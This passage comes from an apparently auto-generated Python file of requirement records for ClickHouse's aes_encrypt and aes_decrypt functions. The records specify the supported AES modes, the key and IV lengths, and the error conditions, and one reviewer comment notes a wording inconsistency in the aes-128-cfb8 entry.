name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.Invalid',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_encrypt`\n'
'function is not valid with the exception where such a mode is supported by the underlying\n'
'[OpenSSL] implementation.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_ECB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ecb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_ECB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ecb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_ECB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ecb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CBC = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cbc` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CBC = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cbc` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CBC = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cbc` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB1 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb1` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB1 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb1` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB1 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb1` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB8 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb8` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB8 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb8` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB8 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb8` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB128 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb128` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB128 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb128` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB128 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb128` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_OFB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ofb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_OFB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ofb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_OFB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ofb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_GCM = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-gcm` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 128 bit key.\n'
'An `AEAD` 16-byte tag is appended to the resulting ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_GCM = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-gcm` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 192 bit key.\n'
'An `AEAD` 16-byte tag is appended to the resulting ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_GCM = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-gcm` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 256 bit key.\n'
'An `AEAD` 16-byte tag is appended to the resulting ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CTR = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ctr` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CTR = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ctr` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CTR = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ctr` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_InitializationVector = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.InitializationVector',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
'parameter to the `aes_encrypt` function that SHALL specify the initialization vector for block modes that require\n'
'it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_AdditionalAuthenticatedData = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.AdditionalAuthenticatedData',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aad` with `String` or `FixedString` data types as the optional fifth\n'
'parameter to the `aes_encrypt` function that SHALL specify the additional authenticated data\n'
'for block modes that require it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_ReturnValue = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.ReturnValue',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return the encrypted value of the data\n'
'using `String` data type as the result of `aes_encrypt` function.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Key_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Key.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `key` length is not exact for the `aes_encrypt` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_InitializationVector_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.InitializationVector.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` length is specified and not of the exact size for the `aes_encrypt` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_InitializationVector_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.InitializationVector.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_encrypt` function for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AdditionalAuthenticationData_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AdditionalAuthenticationData.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `aad` is specified for the `aes_encrypt` function for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AdditionalAuthenticationData_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AdditionalAuthenticationData.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL not limit the size of the `aad` parameter passed to the `aes_encrypt` function.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-ecb` and `key` is not 16 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-ecb` and `key` is not 24 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-ecb` and `key` is not 32 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cbc` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
# Auto-generated `Requirement` records for the `aes_encrypt` key/iv length checks
# in CBC (192/256-bit) and CFB1 modes: each requires an error when `key` is not
# exactly the mode's key size, `iv` (if given) is not 16 bytes, or `aad` is passed.
RQ_SRS008_AES_Encrypt_Function_AES_192_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cbc` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cbc` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cfb1` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cfb1` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cfb1` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
# `aes_encrypt` key/iv length requirement for aes-128-cfb8.
# NOTE(review): unlike every sibling cfb8/cfb1/cfb128 requirement, this description
# reads "and if specified `iv` is not 16 bytes." — it uses "and" instead of "or"
# and omits the "`aad` is specified" clause. This file is generated from the SRS,
# so confirm against the source document whether the divergence is intentional.
RQ_SRS008_AES_Encrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cfb8` and `key` is not 16 bytes\n'
'and if specified `iv` is not 16 bytes.\n'
),
link=None
)
# `aes_encrypt` key/iv length requirements for the remaining modes.
# CFB8/CFB128/OFB: error on wrong key size, 16-byte iv violation, or any `aad`.
# GCM: error on wrong key size or when `iv` is missing / shorter than 8 bytes.
# CTR: error on wrong key size or when a given `iv` is not 16 bytes.
RQ_SRS008_AES_Encrypt_Function_AES_192_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cfb8` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cfb8` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-cfb128` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-cfb128` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-cfb128` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-ofb` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-ofb` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-ofb` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-gcm` and `key` is not 16 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-gcm` and `key` is not 24 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-gcm` and `key` is not 32 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_128_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-128-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-128-ctr` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_192_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-192-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-192-ctr` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_AES_256_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.AES-256-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt` function is set to `aes-256-ctr` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
# Start of the `aes_decrypt` requirements: existence of the function, its call
# syntax, the three mandatory parameters (ciphertext, key, mode), the accepted
# `mode` value format, and rejection of invalid `mode` values.
RQ_SRS008_AES_Decrypt_Function = Requirement(
name='RQ.SRS008.AES.Decrypt.Function',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes_decrypt` function to decrypt data using [AES].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Syntax = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Syntax',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support the following syntax for the `aes_decrypt` function\n'
'\n'
'```sql\n'
'aes_decrypt(ciphertext, key, mode, [iv, aad])\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_CipherText = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.CipherText',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `ciphertext` accepting `FixedString` or `String` data types as\n'
'the first parameter to the `aes_decrypt` function that SHALL specify the data to be decrypted.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Key = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
'as the second parameter to the `aes_decrypt` function that SHALL specify the encryption key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
'to the `aes_decrypt` function that SHALL specify encryption key length and block encryption mode.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.ValuesFormat',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
'of the `aes_decrypt` function where\n'
'the `key_length` SHALL specifies the length of the key and SHALL accept\n'
'`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB] as well as\n'
'[CTR] and [GCM] as the values. For example, `aes-256-ofb`.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.Invalid',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_decrypt`\n'
'function is not valid with the exception where such a mode is supported by the underlying\n'
'[OpenSSL] implementation.\n'
),
link=None
)
# Per-mode `mode` value requirements for `aes_decrypt`: one record for each of
# ECB/CBC/CFB1/CFB8/CFB128/OFB/GCM/CTR at 128/192/256-bit key lengths. The GCM
# entries additionally require the [AEAD] 16-byte tag at the end of the ciphertext.
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_ECB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ecb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
